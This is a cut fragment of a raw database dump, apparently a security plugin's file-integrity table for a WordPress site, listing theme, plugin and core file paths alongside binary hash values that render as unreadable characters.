V�݄�K��','wp-content/plugins/wp-cerber/assets/flags/gi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����K]�0ȥR�','/��i�fh���r���Z(b��2�\Z�>˾�->','',0,'?'),('��U��W˯�(r�','wp-content/themes/brickyard/functions/fe/headerdata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z�9VcM�t�k�','v�h�g���@2}���E��-�i�mZh�B','',0,'?'),('��w(�\'�s�y��:6','wp-content/themes/twentynineteen/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�س���T��+W�','\roh}�}i��V�A�ԁ�H�!v�>4}��M','',0,'?'),('�+Ւ�W���<W�9','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/fancy-type/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W���p)F����','Ş�\0Ӣv�:#%/8ƿȝ╥�e)ݠ�U�','',0,'?'),('��֏�+=���#�Jn','wp-content/plugins/wp-cerber/assets/flags/wf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��iq*��@R��r�\n','}����A���xhI�z�T]�A�s�0;�y�E','',0,'?'),('���<�fÃ�y\0�Y','wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z�.�ʹ�ˆ�g�','\"�e۰�}�)�s��ѓʫt[�\"�i����/V�','',0,'?'),('�\n�[��n������','wp-content/themes/city-store/assets/css/slick.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�K��Gpvo��Hd','��Ҏ�4ѽ�I�#����\0�K��;���#g�','',0,'?'),('��%\r]M�\"�O���v','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']g���ȼy3҉s\r���','�uL��(n��Z]�\Z��3�Q֚�I\"�a�','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~^_��\r}��V_�)x','�?l�;�t�F|t�9u�����.&{Y,A��','',0,'?'),('�K֭<���z�T$9','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/color-palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�D���ܣ���j','�e��7n�!� f��D\Zh\'�J6SJo�1�','',0,'?'),('�Ŏ��c��Z��5ug�','wp-content/themes/saybusiness/sidebar-shop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ç��!v����\n�2�7','���\\����%���y6�o2{�Z��DsS�','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�\\1\nm�z����L�=�','wp-content/themes/edge/assets/font-awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ۚ\\���$فa2E�','�&�zB]<���\"d�5z�y�;{�-6<�C	','',0,'?'),('�]��€Mp vP���','wp-content/plugins/wp-cerber/assets/flags/id.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\'�!�*�HkV��\0��<','~\0`�v��o\\ETZ�eᜊ�z�eA�`�[HF�','',0,'?'),('�c�E%D���	��雩','wp-content/themes/twentynineteen/sass/blocks/_blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�clF�,C>v�W���','bx�͗߇��J�Ne���������@RP','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0!2�}�=��n��','�K��<<�6[��0�j�0��vg������J=�','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Cqw=��*c�$[�','�6V�s4�s=T���,�ˇ4{w��m��z','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb�*���\nog�D�','�o����Ч���$E�71�8�K�I�E','',0,'?'),('� � ʼn�bP#��','wp-content/themes/graduate/inc/customizer/sections/slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���$�^��n�4u�','$d\\�CVh��2�Bp<��\';1g���>p','',0,'?'),('��V�.`Jxbe�y��','wp-content/themes/twentytwentyone/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����k�dɐʎs','L�$0��霕A��]`��H�X\"	���q4�\'','',0,'?'),('�Tdݚej��:�t�','wp-content/themes/city-store/plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����*5�=2��','�2Q̿��M�@7�>��2�%��\n��K�캭','',0,'?'),('�\Z�kD��ӖaL=[V','wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rDŽ\"����TJχٖp�','�����LJ�լ@~���\")���?A��<�','',0,'?'),('�Ĝ��vT�z?��Q','wp-content/themes/catch-responsive/images/gallery/featured2-350x197.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bQ�hho녗�(0','c�,��0�,zZ��S���B�>=	�ٲ�~hZ��','',0,'?'),('󹽉ꖦ�0�3yc\n+R','wp-content/themes/singularity/sidebar-discussion-board.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�|]�-9Vڀ9ۡs#','~�iI�X]����6]G�~\r��*y2�/�','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('�̵��%�0i2�','wp-content/themes/twentynineteen/sass/mixins/_utilities.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�����7��','��/C�ܰ��/ŏ�@��X��Y!C�','',0,'?'),('��T?I�`x\0�o���','wp-content/themes/auberge/template-parts/menu-primary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���``��K�3��','sW���(���k嘨�h�0���|��\"�SA8','',0,'?'),('��6D�Ő�wΗ�6��','wp-content/themes/graphene/images/headers/fluid.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/fV4�ϙ�=�q','���-B$�m��[��*p�˘��ϴܺ�\"�Z','',0,'?'),('���uUܵ�S�5�m!','wp-content/themes/hitmag/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u��͈�����w�wK','���:($K��Ѽ�y�Ϗ�7b���f㓶��','',0,'?'),('��vo���/ND�~\"k�','wp-content/themes/enigma/js/enigma-footer-script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ԉ�C��]\Z�o�x�','����/r���M\0�D����V�IH�h�1��)','',0,'?'),('���w)�Ä��dž�','wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���WY�~�H�#�]','�r����{��\ZI�5�O1���Q��Ӈ���C��','',0,'?'),('���qL�V?Uv7O(�','wp-content/themes/simpleshift/parts/header-banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&�u�z�ij*���','k̍��x2Y���S�e�.��&	�=�U�?Ag','',0,'?'),('���uN���i\'%�','wp-content/themes/graphene/admin/wpml-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"\")$�(�aa���','�[�U.��O�_߬փO=>{�����Q����','',0,'?'),('���a��\\o)r�)�y','wp-content/themes/catch-flames/css/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�=³zeX*�|��b','Ä@��Pw*\'�0M�\'D�۝c�1��ח�d��','',0,'?'),('��S�A@=�Y���v','wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��NG���:��l','hKu�)$�cU��o>��ᦐ���6�����','',0,'?'),('�����➞��^՘R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʝ��\'��dwgZ�|�','b!��&f�a�u���Lqm<.�ќ3/X�c�[','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),('�8�smV���P�`','wp-content/themes/singularity/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��\"x!���RUfc,','��~�5WS���C��$i#�\'�K�C�FH�','',0,'?'),('� ��ga���y\"�','wp-content/themes/gildrest/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��剿	���*��','��\"�*^�l\\@�\'Á+�5���1B�\\Ԓg','',0,'?'),('�#�f�f���D/','wp-content/themes/hitmag/inc/kirki/includes/panels/class-kirki-panels-default-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z����?\\���sH�(\Z','�o�xSY���sg�`Ȅ� \"��r6Z��V, C�','',0,'?'),('�$i�6]}���+���','wp-content/plugins/wp-cerber/assets/flags/gd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(*Gkη����G֊�','�K���dh��JJ�q�yG|-<�r�	S[l��','',0,'?'),('�7BVRm��\0p�l��Q','wp-content/themes/graphene/images/social/behance.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C����8!��s�ћZ','_��y��B�jT�Qo�9���� b�S\"}�p�','',0,'?'),('�:�\Z�O!�ԩ�b�Ş','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/matchbrackets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ŏ��1D�i2�&��','k\"l��EE��\'꣢d:=����\"�,%p','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-׼�of|W�x\\��|�M�)���ˢ','',0,'?'),('�RՇZ;mR���h-��','wp-content/themes/catch-flames/js/jquery.cookie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�O�kXe�ZxX_�_','�\0s�Kc���0u�\'n���\0��~�.8�z','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�a\"��Å�\Z}n�K��','Zm��+�w��Ⱦ���d������2�D','',0,'?'),('�Z	��\Z�_�W|v=\\�U','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/tern/worker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֵ_>wj�Ʊ��[��','�x������eP�@��3<—���� *\n<','',0,'?'),('�\\�4*կJޓ.�]T=','wp-content/themes/auberge/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,<��\"C���ze%3�','�%���j�A���\ZP\"���\Zagn��\'nȳ','',0,'?'),('�fN�[�1����(@�~','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/scroll/annotatescrollbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v����ً�#H���','���;������%UM�Ǡ�\r��*rеa:0','',0,'?'),('�o��7�����8��\\�','wp-content/themes/hitmag/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��բ%������2Жj','yC��ul��$ó�tjk�۪i?�X/��=7[�','',0,'?'),('�x���}���\\���3��','wp-content/themes/monograph/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������F���R��','�[�\r���n\Z52dl(��=�T�l��ct���','',0,'?'),('�{����냗%���','wp-content/themes/graduate/assets/plugins/js/unminified/slick.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZeG���ޠE߭C�','������ST�_oU�:��T]S�W�L٠�L,�','',0,'?'),('��E�O,\rP;א�','wp-content/themes/graphene/js/jquery-ui/jquery.ui.slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�<؛:��TI-|�','�����8�Y��$I}�)�o\'E��؁w����z�','',0,'?'),('���{䅡A2Ye��<','wp-content/themes/graphene/sidebar-two.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٻh����2o;]','���Zo�b#rZ�\'\r��Y����[DD��A.','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�2�~����CO�',',f;��8`�=�[D�\n\\cA�O�Te�� ','',0,'?'),('����I�*�:o�','wp-content/plugins/akismet/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('���\n�2d���fA','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/slider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\r���s�)g?','sj��	6��V`f�\'jҧ��� �~I�nR','',0,'?'),('�zZ�f���ip^�2׎','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\0����\Z^2�-!]',' �+	M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T	��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('����O�i�l��%βf','wp-content/plugins/wp-cerber/assets/flags/gu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��ņ-�\0hH�Bs','��p,�a�L�|v��LY�*[���T�$+��','',0,'?'),('���c��� ��ˆ�L','wp-content/themes/newsmag/inc/widgets/posts_list_horizontal/class-widget-newsmag-posts_list_horizontal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�6t�-+\n�_hʚwx','�3����ѣ��=Yv\Zh*�j�`e�\0�4�','',0,'?'),('��`Z�7��Y��l�','wp-content/themes/edge/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݏ��l첁\"E����','�\'G�Y��&����dHzu��k�����4�=','',0,'?'),('��\0h�+�)m�D\nW;��','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('��S��<�}X+ӥ\r�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/php/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㳼G��2mv�`�K��','���r�8���_�	S}�>:5\"S���_','',0,'?'),('�^3w\nyމ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�%$�$�H�b@��','Ίa����AcZ�����\"g8�>h�.@��Cs','',0,'?'),('�ș��<���@��w(','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/wrap/hardwrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�b��ٹ���F�K�','�’�u�)&���E��}�x%mW�����:��','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('����\Z掠�5��N','wp-content/themes/edge/inc/widgets/widgets-functions/register-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�3��I>M�i�Y','�Bz��0,]�ֶ5�����y����C\'{�T|�','',0,'?'),('��22\0�P��I@f','wp-content/themes/authorize/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!m#I�����H�o��','F��	���|�΂tP���ct���\0�@����t','',0,'?'),('�%l�P��mx�/�Q','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/search/searchcursor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����qQR	�X?\Z�B','M430��+?�ŎkV.a��ˀ<\n�����N�!','',0,'?'),('�4ͅ}����M�0�i','wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/kirki-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��<���g�m��N','{4�	�\"-	v]�F���*Ş( <�ߔh�É>','',0,'?'),('�!�֐(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����)	','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�*�uH��-3���-','wp-content/themes/wp-simple/assets/images/preview/320x302.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E21��\0�{zȁB�','�?4N�[��i��\0��5�K��5�0w\Z�','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$?6/�%��k�<j��@�','����\r�/�t��:to���7�L�~���QLl~S','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('�=Qo��y[~y���f','wp-content/themes/authorize/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��X�z��U��m','P���}���K%:�>B�Cхݺ��y�WG9�','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n	� ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�PNmX`�.s�\ZO�\n^','wp-content/themes/event/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	����\"!�_�t�W','CU^y�\n�F�m5 �v�$�ܐ�8��>c���','',0,'?'),('�`P`�UY;���{%','wp-content/themes/hitmag/inc/kirki/includes/webfonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�Rjy�|��/c]','@��I��?\"�V���Þ�{UF�}�ɤ��','',0,'?'),('�eL��*�\"Z�\'�|','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/scroll/scrollpastend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�m��z�f������','.�ik�N���ܱ�@�?*Cϲ�Qp��X���*','',0,'?'),('�k�q1��X�\n�0e[','wp-content/themes/weblog/acmethemes/hooks/social-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�DՑ���?��B4�','Gyd�s�ƾ�_h	|-\\1�%ǝƿ����~�','',0,'?'),('�p�������4���{','wp-content/plugins/wp-cerber/assets/flags/tj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EK|��$1��(','5���J	�A��a�\\L�dz���4���~U�','',0,'?'),('�rf᱁�^�/{�0�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/spacing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\n�r�C��\0g','�lK��VE*�\"Ls�G�=��:/��>�D�ġ','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('�z<����k\"V\'�]DK','wp-content/themes/hemingway/hemingway-editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�;Rt��k���� ','��\r�\'LKN6��Y��39 ����������M�V�','',0,'?'),('��t0��B�t�.by^Dz','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/textile/textile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����/�\Z[9}��','|�\Z���j�m��Մ&~MS�p���^9r���c','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j\'�~?2��]�g�Z','�c<*WB!�,�5\ZTQEF�#��h_a�~�','',0,'?'),('��dm@���dp��:%','wp-content/themes/hitmag/inc/kirki/assets/scss/tooltips.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Uh���_G��r��	��','CM\n.�Ց?fG��B�Vev��r\r�z9���r1','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('����Y��1R�YWFo�','wp-content/themes/simpleshift/assets/js/sticky.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\~���Nx6�W�/','c�8�@(W��|���3%*=��8G�<~{ �7','',0,'?'),('��ыZ�#�W\nߪ�M$','wp-content/themes/graphene/images/social/ask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.RC�Q�ա���0A','���j��Dݜj(w)0g@O�9��>tV+:J>','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QJt\"��!!�_�^	','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N	�S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('��B��dts�@4ʪ�x','wp-content/themes/hitmag/inc/kirki/assets/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��K�A���xQy','.�~h���h��e��P�(��`Y�oRQ�','',0,'?'),('����	�6��\r�l���','wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[	$3','',0,'?'),('��禦��z���b%*�','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��8�RR��J���','��}��ڝ���$X����Y�\0%tJ�\'���','',0,'?'),('���\'�-�dG��˻`','wp-content/themes/Yegor/inc/template-tags.php',0,'����n�j+ñ�/�','����n�j+ñ�/�','Uv�����q$Z@I=>������`�]�܍%','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('����cs,\Z����','wp-content/themes/newsmag/assets/images/picture_placeholder.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`+�#j���|�������','識R����0��L�Q)� �8�;�0��hk','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�\r�y�R�]�x���\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�<P�S2��ȯV','Ӡ‘�P�G�B���$���	�JE3�n^�','',0,'?'),('��^�8�$�!�+$v�','wp-content/themes/simpleshift/inc/kirki/includes/webfonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�	F�*��m�X�da�','��Z�l��{��B�YIl�;1OK[�fIo��J�','',0,'?'),('�!,(?����#���','wp-content/plugins/wp-cerber/assets/flags/ck.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'[8A3��;�y��g�','��3{����;��ߍ2�Dh��}��(�†�','',0,'?'),('�\"���\n�8��4i%x�','wp-content/themes/exoplanet/js/jquery.bxslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W���ՃkT_��','�L>}^��{�8j���C<츌������nm]','',0,'?'),('�$]�5�f\'Û�|�lV','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-select-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AS�7(VĨ��6�','�Z�\"Et�o�TK@NB5�!��Ϣp�d','',0,'?'),('�6����ͥ��9�\r','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/css/scss.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�d���^�g\'�','�ϸ����?��K��?�%b�,Cu�&�<','',0,'?'),('�:�u?͜PF��{S�M�','wp-content/plugins/wp-cerber/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�\n�.[�%�','\Zw<��>��s-��ӆd��@D�>f�\"�3','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�:	ڂa�7��Zcdm��%','',0,'?'),('�p���D���mJ��','wp-content/themes/monograph/inc/class-dotorg-plugin-review.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ɿV�ԫ��r���q','�w=�묫!:O.7�s�]A^*�F(��k</ld','',0,'?'),('�{m����5U3�Y����','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('���������XM\ny','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/rtl/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|0���HIJd_','E��Ԃh�Z �z2=N\Zc�ŕ	�&���_��','',0,'?'),('���;}�>��#_�Or�','wp-content/themes/enigma/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C˫,��ο|)�t','�w���%����r�x\'vn9�?��X������so','',0,'?'),('��>�.�X���C���`�','wp-content/themes/newsmag/assets/sass/site/_site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e��P5o��I�','��ӭ����;8�q�4|T]P��B�ɨ�b�7?','',0,'?'),('��of�w0��@�N\Z8','wp-content/themes/Kent/ft-options.php',0,'���W�5I��h��K�','���W�5I��h��K�','�2�:��&��7i�|���^�g�X�.�s��','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���<�ِ�J��D��','�#�[�\Z*\n�L���=I�Dwguwd��,�\'�IE?�','',0,'?'),('��84A	